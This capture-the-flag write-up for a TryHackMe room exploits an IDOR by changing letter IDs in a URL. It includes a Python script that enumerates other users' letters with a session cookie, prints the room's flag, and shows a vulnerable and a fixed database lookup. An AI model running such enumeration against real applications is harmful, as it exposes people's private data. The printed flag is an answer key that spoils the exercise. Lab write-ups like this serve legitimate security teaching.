Hello everyone! In this write-up, we'll solve the Love Letter Locker room on TryHackMe. The goal is to access hidden love letters and retrieve the flag. Let's get started.

Reconnaissance

We start by scanning the target machine:

nmap -p- <machine_ip>

The scan reveals two services:

  • SSH running on one port
  • A web application running on port 5000

Web Access

We open the application in the browser:

http://<machine_ip>:5000

We land on a web app called Love Letter Locker, where users can register and log in.

After creating an account and logging in, we access a section called Letters.

Application Analysis

Inside the interface, we notice a hint provided by the application:

Every love letter gets a unique number in the archive. Numbers make everything easier to find.

This strongly suggests that letters are identified using numeric IDs.

Hypothesis

Each letter is likely accessed through a predictable URL parameter such as:

/letters/<id>

If the server looks letters up by that number alone, without checking that the logged-in user owns the letter, this is a potential IDOR (Insecure Direct Object Reference) vulnerability.

Exploitation

We start by creating a dummy letter filled with random content (e.g. "test test test") to generate a valid entry in the system.

Once the letter is created and opened, we observe the URL structure:

/letters/3

This shows that letters are identified by small integers, consistent with IDs being assigned sequentially as letters are created, so other users' letters should sit at neighbouring values.

To test for IDOR, we manually modify the ID in the URL:

/letters/1

After accessing the modified endpoint, we are able to retrieve another user's letter that was not originally visible to us.

This confirms the presence of an IDOR vulnerability, allowing direct access to objects by manipulating their identifier in the URL.
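Rather than editing the ID by hand one value at a time, the same test can be scripted with the logged-in session cookie. The script below is an added example and not part of the original write-up; the base URL, the cookie header and the ID range are assumptions (the room's real session cookie name and the number of stored letters are not given on the page). It walks a range of IDs, skips our own letter, keeps every letter the server returns, and searches the results for a THM{...} flag.

```python
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional

# Assumed target; replace <machine_ip> with the room's IP before running for real.
BASE_URL = "http://<machine_ip>:5000"

# A fetcher takes a URL and the raw Cookie header value and returns the body,
# or None when the server refuses or cannot find the letter.
Fetcher = Callable[[str, str], Optional[str]]


def http_fetch(url: str, session_cookie: str) -> Optional[str]:
    """Fetch url as the logged-in user; None on 401/403/404, raise on anything else."""
    req = urllib.request.Request(url, headers={"Cookie": session_cookie})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        if err.code in (401, 403, 404):
            return None
        raise


def enumerate_letters(own_id: int, ids: Iterable[int], session_cookie: str,
                      fetch: Fetcher = http_fetch) -> Dict[int, str]:
    """Request /letters/<id> for every id except our own; return the ones that load.

    Any entry in the result is a letter we were not supposed to see, because the
    only letter this account owns is own_id.
    """
    found: Dict[int, str] = {}
    for letter_id in ids:
        if letter_id == own_id:
            continue
        body = fetch(f"{BASE_URL}/letters/{letter_id}", session_cookie)
        if body is not None:
            found[letter_id] = body
    return found


FLAG_RE = re.compile(r"THM\{[^}]*\}")


def find_flags(letters: Dict[int, str]) -> List[str]:
    """Return every THM{...} token found in the retrieved letters, in id order."""
    flags: List[str] = []
    for letter_id in sorted(letters):
        flags.extend(FLAG_RE.findall(letters[letter_id]))
    return flags


if __name__ == "__main__":
    # Assumed cookie name; copy the real Cookie header from the browser's dev tools.
    cookie = "session=<your_session_cookie>"
    leaked = enumerate_letters(own_id=3, ids=range(1, 20), session_cookie=cookie)
    for letter_id, body in leaked.items():
        print(f"/letters/{letter_id}: {body[:80]!r}")
    print("flags:", find_flags(leaked))
```

The fetcher is injectable so the enumeration logic can be exercised against a stand-in store before pointing it at the live machine; in practice keep the ID range small and the delay reasonable, since every hit is a request the target will log.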

Flag

Inside the retrieved letter:

THM{1_c4n_r3ad_4ll_l3tters_w1th_th1s_1d0r}

Conclusion

This room demonstrates a classic IDOR vulnerability, where sensitive data can be accessed simply by modifying a parameter in the URL.

No authentication bypass or complex exploitation was required: the application checks that a user is logged in, but never checks that the user is allowed to read the specific letter requested. Understanding how object references are handled is enough.

Impact:

  • Unauthorized access to other users' private data
  • Full exposure of stored content through predictable IDs
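The root cause and its fix fit in one query each. The example below is added here and is not the room's source code (the Love Letter Locker application's real schema and framework are not shown on the page); it models the archive as an in-memory SQLite table with an assumed owner column. The vulnerable handler looks a letter up by ID alone, exactly the behaviour exploited above; the fixed handler scopes the lookup to the current user and answers "not found" for both missing and foreign letters, so the endpoint stops being an oracle for which IDs exist.

```python
import sqlite3


class NotFound(Exception):
    """Raised where a web handler would return HTTP 404."""


def build_db() -> sqlite3.Connection:
    """Constructed sample archive: three letters owned by three different users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE letters (id INTEGER PRIMARY KEY, owner TEXT NOT NULL, body TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO letters (id, owner, body) VALUES (?, ?, ?)",
        [
            (1, "alice", "Dear Bob, meet me at the lighthouse. THM{constructed_sample_flag}"),
            (2, "bob", "Alice, I kept your letter."),
            (3, "mallory", "test test test"),  # the dummy letter created during testing
        ],
    )
    conn.commit()
    return conn


def get_letter_vulnerable(conn: sqlite3.Connection, current_user: str, letter_id: int) -> str:
    """IDOR: current_user is known to the handler but never used in the lookup."""
    row = conn.execute("SELECT body FROM letters WHERE id = ?", (letter_id,)).fetchone()
    if row is None:
        raise NotFound
    return row[0]


def get_letter_fixed(conn: sqlite3.Connection, current_user: str, letter_id: int) -> str:
    """Authorisation enforced in the query: only the owner's letters can match.

    A foreign letter and a nonexistent letter produce the same 404, so an
    attacker cannot use the response to learn which IDs are in use.
    """
    row = conn.execute(
        "SELECT body FROM letters WHERE id = ? AND owner = ?", (letter_id, current_user)
    ).fetchone()
    if row is None:
        raise NotFound
    return row[0]


def can_read(conn: sqlite3.Connection, handler, current_user: str, letter_id: int) -> bool:
    """True if handler lets current_user read letter_id; mirrors a 200 vs 404 check."""
    try:
        handler(conn, current_user, letter_id)
        return True
    except NotFound:
        return False


if __name__ == "__main__":
    db = build_db()
    # mallory owns only letter 3; letter 1 belongs to alice.
    print("vulnerable, mallory -> /letters/1:", can_read(db, get_letter_vulnerable, "mallory", 1))
    print("fixed,      mallory -> /letters/1:", can_read(db, get_letter_fixed, "mallory", 1))
    print("fixed,      mallory -> /letters/3:", can_read(db, get_letter_fixed, "mallory", 3))
```

Putting the owner check into the query, rather than fetching the row and comparing afterwards, means there is no code path that has the foreign letter in hand and could accidentally return it; pairing this with unguessable identifiers is a useful extra, but not a substitute for the ownership check.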